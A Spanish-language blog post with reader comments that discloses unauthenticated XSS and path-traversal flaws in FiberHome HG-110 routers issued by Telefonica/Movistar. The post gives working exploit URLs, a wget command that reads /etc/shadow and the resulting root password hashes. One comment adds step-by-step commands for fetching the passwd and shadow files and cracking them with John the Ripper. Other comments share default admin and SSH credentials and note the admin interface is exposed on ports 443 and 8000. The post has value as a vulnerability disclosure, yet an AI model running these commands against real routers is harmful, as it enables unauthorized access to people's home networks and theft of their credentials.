Vulnerabilidad en todos los routers Fiberhome HG-110 de Telefonica/Movistar

En algunos paises, Telefonica/Movistar entrega a sus clientes un router FiberHome HG-110, uno blanco y con dos antenitas:

Las vulnerabilidades que he encontrado son:

Cross-Site Scripting: https://router.internal.ip:port/cgi-bin/webproc?getpage=%3Cscript%3Ealert%28this%29%3C/script%3E&var:menu=advanced&var:page=dns

Local File Include and Directory/Path Traversal: https://router.internal.ip:port/cgi-bin/webproc?getpage=../../../../../../../../../../../../etc/passwd&var:menu=advanced&var:page=dns

Para poder explotar estas vulnerabilidades no es necesario estar autenticado.

Informacion del dispositivo:

HardwareVersion :	HG110_BH_R1A
SoftwareVersion :	HG110_BH_V1.6
Firmware Version :	1.0.0

No descarto que estas mismas (y otras) vulnerabilidades puedan afectar a otros modelos del mismo fabricante.

ACTUIALIZADO El httpd se ejecuta como “root” (mini_httpd) por lo que es posible acceder, mediante LFI, a archivos con esos privilegios.

$ wget -o /dev/null -O – “https://192.168.1.1:8000/cgi-bin
/webproc?getpage=../../../../../../../../../../../../etc/shadow&
var:menu=advanced&var:page=dns”

#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::

root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::

#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

~ $ ps ax|grep httpd

509 root 4212 SW /usr/sbin/mini_httpd -d /usr/www -c
/cgi-bin/* -u roo

~ $

23 comentarios

  1. gracias x la info… hay q ver q otras vulnerabilidades posee… xD

  2. $ ps ax|grep httpd

    lo ejecutas en el router??? tiene una cuenta ssh??

  3. Hola Brujo:

    Si, tiene cuenta ssh. Es un linux con servicio ssh

  4. gracias! muy buena info

  5. Una Correccion, las vulnerabilidades se pueden realizar de forma remota si el usuario esta Autenticado, de forma local Tambien necesita Autenticacion. ya que este solo puede ser visible con un logueo posterior.

    POSIBLES RAZONES.

    1- los Router los FIXEARON!
    2- al realizar el Analisi pudistes dejar configuracion guardada sin Ninguna intencion por eso pudo Haberte surgido la explotacion sin Autenticacion.

    Saludos! y Beuna Info!

  6. Segun mi Analisis, una posible solucion para evitar esto de forma remota seria abrir puerto 80 y hacer redireccionamiento a localhost definido sin uso del usuario, asi e atacante no podria sacar la interfaz de forma siple y generaria una confusion de.. Sera que tiene ftth o no?.

    Espero les Sirva.

  7. Hola Maztor:

    Las pruebas las hice con la config default, simplemente sacandolo de la caja y conectandolo a la corriente.

  8. Este router utiliza chipset Realtek (procesador RTL8672 adsl RTL8271B) con 32 Mb. de RAM y 8 Mb. de FLASH y es muy similar en hardware al HUAWEI HG532C comercializado en España. Seguramente pronto habra novedades respecto a mejorar su firmware…

  9. como se llaman los cables que parecen coaxial de las antenas
    y como es su configuración del hadware

  10. muy interesante informacion y hay mas router que tienen pifias pero estas pifias surgen donde el firmware es modificado por movistar chile para dejarnos las conexiones como las weas xD

  11. ¿Como accedo via ssh?, ¿con que usuario y contraseña?, ¿son las mismas cuentas del acceso web?
    Yo tengo acceso via web al router, me gustaría saber como lo hago para la conexión ssh.
    Gracias.

  12. Hola leonciokof: En mi caso el acceso ssh era usando las mismas credenciales que via web (la de admin)

  13. Por defecto viene el puerto 443 (https) abierto para el exterior… uno puede desde afuera acceder a la configuración básica (donde se elige la clave wifi) sin necesidad de estar conectado a la red. Lo detecté con ShieldsUp! Mi solución fue hacer forward del puerto 443 al puerto 8765 (ese puse en mi caso) a la ip 192.168.1.1, usando la dirección (que tampoco requiere login) http://router_ip:port/cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=portforwd

  14. Encontré además que se puede acceder al puerto 8000 desde afuera :S, hay que hacer forward también a ese puerto.

  15. para obtener la contraseña de root podrian usar la misma vulnerabilidad encontrada por zerial para luego crackearlas con john the ripper como dijeron mas arriba desde otra maquina (offline cracking)

    # obtienen el archivo passwd y el archivo shadow

    wget “http://192.168.1.1:8000/cgi-bin
    /webproc?getpage=../../../../../../../../../../../../etc/passwd&
    var:menu=advanced&var:page=dns”
    wget “http://192.168.1.1:8000/cgi-bin
    /webproc?getpage=../../../../../../../../../../../../etc/shadow&
    var:menu=advanced&var:page=dns”

    # instalan el john the ripper, luego “juntan” los dos archivos

    unshadow passwd shadow > fiberhome.pwd

    # luego tratan de crackear este nuevo archivo por fuerza bruta, les recomiendo hacerlo en alguna maquina potente si tienen acceso

    john -incremental:lanman fiberhome.pwd

  16. Someone could decrypt the root password?

  17. Zerial

    octubre 30, 2011 a las 5:01 pm

    hi Joao Paulo:

    You can use a brute-force script to crack the shadow. Is not the same password at all.

    cheers

  18. Hoy iba caminando y me encontre ese mismo router botado en la calle xd y taba bueno… xd

  19. hola disculpen , alguno sabe cual es la contraseña admin del modem router?
    saludos

  20. admin:1234

  21. hola! Alguien sabe como cambiar el password del servicio SSH? para que no sea root root. Necesito el acceso SSH pero es bastante vulnerable. Ademas existe alguna forma de reiniciar el equipo usando SSH?. gracias.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Esto sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.